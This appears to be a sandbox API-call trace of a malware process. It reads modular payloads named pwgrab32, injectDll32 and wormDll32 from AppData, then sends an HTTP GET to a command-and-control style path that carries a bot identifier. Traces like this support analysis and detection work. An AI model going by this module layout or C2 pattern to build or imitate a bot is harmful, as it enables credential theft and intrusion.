	[0241.377] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.377] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.378] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.378] CloseHandle (hObject=0x6e4) returned 1
	[0241.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.378] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.378] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.378] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.378] CloseHandle (hObject=0x6e4) returned 1
	[0241.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.378] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.378] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.378] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.379] CloseHandle (hObject=0x6e4) returned 1
	[0241.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7791ca40, dwHighDateTime=0x1d50a6a)) 
	[0241.379] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.379] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.379] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0241.379] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0241.379] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6940
	[0241.379] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0241.379] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0241.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0241.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0241.379] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0241.379] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0241.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1858, Size=0x10) returned 0x27e1828
	[0241.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0241.380] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1828, Size=0x10) returned 0x27e1858
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0241.380] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1858, Size=0x10) returned 0x27e1828
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0241.380] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1828, Size=0x20) returned 0x27c07d8
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0241.380] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c07d8, Size=0x20) returned 0x27c0800
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0241.380] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c0800, Size=0x20) returned 0x27c07d8
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0241.380] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0241.380] GetLastError () returned 0x12
	[0241.380] FindClose (in: hFindFile=0x22b6940 | out: hFindFile=0x22b6940) returned 1
	[0241.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0241.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.380] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0241.380] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.380] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.380] CloseHandle (hObject=0x6e4) returned 1
	[0241.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.381] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0241.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.381] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0241.381] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.381] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.381] CloseHandle (hObject=0x6e4) returned 1
	[0241.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.381] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0241.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.381] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0241.381] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.381] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.381] CloseHandle (hObject=0x6e4) returned 1
	[0241.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.382] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0241.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.382] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0241.382] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.382] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.382] CloseHandle (hObject=0x6e4) returned 1
	[0241.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.382] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0241.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.382] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0241.382] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.382] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.382] CloseHandle (hObject=0x6e4) returned 1
	[0241.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.383] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0241.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.383] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0241.383] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.383] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.383] CloseHandle (hObject=0x6e4) returned 1
	[0241.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.383] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0241.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0241.383] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0241.383] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0241.383] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0241.383] CloseHandle (hObject=0x6e4) returned 1
	[0241.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x77942ba0, dwHighDateTime=0x1d50a6a)) 
	[0241.384] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0241.384] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0241.384] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/EXsCXr7Rl8Pl6Qn6N/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0241.384] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0241.384] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0242.760] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
